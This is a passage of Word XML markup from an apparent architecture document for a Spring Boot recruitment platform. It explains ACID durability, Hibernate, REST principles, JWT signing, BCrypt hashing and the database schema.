              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Once a transaction commits, its effects are permanent and will not be lost even if power fails immediately after.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4896"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>When an offer is accepted by a candidate, the status change is written to database transaction logs and disk, surviving JVM restarts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>6. Object-Relational Mapping (ORM) &amp; Hibernate Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">The Impedance Mismatch: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Object-Oriented programming languages represent data as rich object graphs with inheritance, encapsulation, and polymorphism. Relational databases represent data as two-dimensional tables governed by mathematical set theory. This conceptual divide is called the Object-Relational Impedance Mismatch. Hibernate bridges this gap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>JPA (Java Persistence API): The standard Java specification (interfaces) defining how Java objects map to relational databases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Hibernate: The concrete implementation of the JPA specification bundled inside Spring Boot.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Persistence Context (First-Level Cache): An in-memory cache of managed entity instances. Within a single transaction, fetching the same entity twice returns the identical Java memory reference without re-querying the database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Dirty Checking: At the end of a transaction, Hibernate automatically compares the current state of managed entities against their initial snapshot. Any modified attributes generate SQL UPDATE statements automatically, without calling repository.save().</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>7. REST Architectural Constraints &amp; Principles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">REST Definition: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Representational State Transfer (REST) is an architectural style for distributed hypermedia systems introduced by Roy Fielding in 2000. GlobalCo adheres strictly to its foundational constraints:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Client-Server Separation: User interface concerns are completely separated from data storage concerns. The React frontend can be redesigned or replaced with a mobile app without touching the Spring Boot backend.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Statelessness: The server never stores client session state. Every request contains all information necessary to authenticate and fulfill it (via JWT Bearer tokens).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Cacheability: Responses must explicitly label themselves as cacheable or non-cacheable to prevent clients from reusing stale requisition data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Uniform Interface: Resources are identified by URIs (e.g., /api/jobs/42), manipulated through representations (JSON), and self-descriptive messages (MIME types).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Layered System: Clients cannot tell whether they are connected directly to the end server or to an intermediary (e.g., reverse proxy, load balancer, CDN).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>8. Cryptographic Foundations: JWT &amp; BCrypt Password Hashing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>8.1 JSON Web Token (JWT) Anatomy &amp; Signing Math</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Token Anatomy: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>A JSON Web Token consists of three parts separated by periods (.): Header, Payload, and Signature.</w:t>
        <w:br/>
        <w:t>Format: xxxxx.yyyyy.zzzzz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Header: Identifies the token type ('JWT') and cryptographic signing algorithm ('HS256' for HMAC-SHA256). Base64Url-encoded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Payload: Contains claims—statements about an entity (e.g., sub: 'riya.backend', userId: 2, roles: ['ROLE_CANDIDATE'], exp: 1773667200). Base64Url-encoded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Signature: Calculated by taking the encoded header, the encoded payload, a secret key known only to the backend, and signing it using the specified algorithm:</w:t>
        <w:br/>
        <w:t>Signature = HMACSHA256(base64UrlEncode(header) + '.' + base64UrlEncode(payload), secretKey)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9648"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9648"/>
            <w:shd w:fill="FEF2F2"/>
            <w:tcBorders>
              <w:top w:val="none"/>
              <w:left w:val="single" w:sz="36" w:space="0" w:color="EF4444"/>
              <w:bottom w:val="none"/>
              <w:right w:val="none"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1E3A8A"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[CRYPTOGRAPHIC INTEGRITY VS CONFIDENTIALITY] </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CRITICAL SECURITY PRINCIPLE: JWTs are SIGNED, NOT ENCRYPTED!</w:t>
              <w:br/>
              <w:t>Base64Url encoding is NOT encryption. Anyone who intercepts a JWT can decode the header and payload in plaintext. However, they CANNOT modify any claim (such as changing their role from ROLE_CANDIDATE to ROLE_ADMIN) without invalidating the cryptographic signature. Because the attacker does not possess the 256-bit server secret key, any modified token is immediately rejected by JwtAuthenticationFilter.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>8.2 BCrypt Hashing vs Plaintext &amp; Fast Hashes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Password Security: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Storing passwords in plaintext is a catastrophic security violation. Storing them using fast cryptographic hashes (like MD5 or SHA-256) is equally dangerous because modern GPUs can compute billions of SHA-256 hashes per second, allowing attackers to reverse passwords using precomputed Rainbow Tables. GlobalCo uses BCrypt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Cryptographic Salting: BCrypt automatically generates a unique, cryptographically random 128-bit salt for every password before hashing. Even if 100 users have the password 'Password@123', all 100 resulting hash strings in the database will look completely different, rendering rainbow tables useless.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Adaptive Work Factor (Cost Factor): BCrypt is intentionally slow and computationally expensive. In GlobalCo, a work factor of 10 is used, meaning the key derivation algorithm executes 2^10 = 1,024 iterations. This makes brute-force dictionary attacks economically infeasible for attackers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>One-Way Function: It is mathematically impossible to decrypt a BCrypt hash back into the original password. Verification works by taking the candidate's input password, combining it with the salt extracted from the stored hash, running the algorithm, and comparing the resulting hash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>11. Backend Architecture &amp; Request Flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The Spring Boot 3.2.3 backend is designed according to the Single Responsibility Principle and strict Separation of Concerns across five distinct internal layers:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>REST Controller Layer (@RestController): Responsible solely for HTTP deserialization, JSON schema binding, request validation (@Valid), and status code orchestration (200 OK, 201 Created, 204 No Content). Controllers never execute database queries directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Service Layer (@Service, @Transactional): Encapsulates all domain business logic, state machines, algorithmic scoring, transaction boundaries, and audit logging. Guarantees ACID atomicity across multi-entity operations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Data Access Layer (@Repository): Extends Spring Data JPA's JpaRepository&lt;T, ID&gt;. Implements optimized query derivation, JPQL custom queries with JOIN FETCH to prevent N+1 queries, and native SQL when required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Data Transfer Object (DTO) Layer: Decouples internal database entities from external network payloads. Protects against Mass Assignment vulnerabilities and prevents Hibernate circular serialization loops.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Global Exception Handler (@RestControllerAdvice): Intercepts runtime exceptions (ResourceNotFoundException, DuplicateApplicationException, MethodArgumentNotValidException) and transforms them into standardized JSON error envelopes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>12. Database Architecture &amp; Schema Deep Dive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The relational data model is designed to Third Normal Form (3NF) to eliminate data redundancy and ensure relational integrity. The schema supports multi-tenant isolation through role boundaries and company foreign keys.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing: Relational Entity-Relationship Diagram (ERD)</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9648"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9648"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+--------------------+         +-----------------------+         +----------------+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>|       USERS        | 1 --- 1 |   CANDIDATE_PROFILES  | 1 --- * | PROFILE_SKILLS |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+--------------------+         +-----------------------+         +----------------+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  | 1            | 1                       | 1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  |              |                         |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  | *            | *                       | *</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+------------+ +----------------+        +----------------+        +----------------+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>| USER_ROLES | | NOTIFICATIONS  |        |  APPLICATIONS  | * -- 1 |      JOBS      |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+------------+ +----------------+        +----------------+        +----------------+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  |                                        | 1        | 1            | *        | *</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  |                                        |          |              |          |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  |                                        | *        | 1            v 1        v 1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+------------+                           +------------+ +--------+ +---------+ +----------+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>| AUDIT_LOGS |                           | INTERVIEWS | | OFFERS | |COMPANIES| |CATEGORIES|</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+------------+                           +------------+ +--------+ +---------+ +----------+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>12.1 Relational Integrity &amp; Performance Constraints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Unique Constraint on Applications: applications table enforces a composite UNIQUE constraint on (job_id, candidate_id), guaranteeing at the database level that a candidate cannot apply twice to the same requisition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Composite Key on Saved Jobs: saved_jobs table enforces a unique key on (user_id, job_id), preventing duplicate bookmarks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>N+1 Problem Prevention: JobRepository utilizes 'JOIN FETCH j.company JOIN FETCH j.category' to retrieve the complete job object graph in a single SQL query, eliminating N+1 query overhead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>13. Entity Model &amp; Data Dictionary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The persistence tier comprises 12 primary JPA entities mapped to relational database tables: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1584"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Entity Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Database Table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Primary &amp; Foreign Keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Relational Mappings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
